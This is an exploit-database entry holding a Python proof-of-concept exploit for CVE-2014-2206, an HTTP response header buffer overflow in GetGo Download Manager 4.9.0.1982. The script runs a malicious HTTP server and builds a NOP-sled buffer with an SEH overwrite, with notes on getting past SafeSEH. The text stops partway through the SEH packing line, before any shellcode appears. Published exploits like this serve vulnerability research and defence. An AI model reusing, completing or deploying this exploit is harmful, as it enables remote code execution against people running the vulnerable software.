GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution

Julien Ahrens 2014-03-09 remote windows
#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version:       v4.9.0.1982
# CVE:           CVE-2014-2206
# Date:          2014-03-09
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on:     WinXP SP3-GER 
#
# Howto / Notes:
# The SEH overwrite address was taken from outside the loaded modules, because every loaded module is SafeSEH-enabled
#

from socket import *
from time import sleep
from struct import pack
 
host = "192.168.0.1"
port = 80
 
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
 
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
 
junk0 = "\x90" * 4107
nseh = "\x90\x90\xEB\x06"
seh=pack('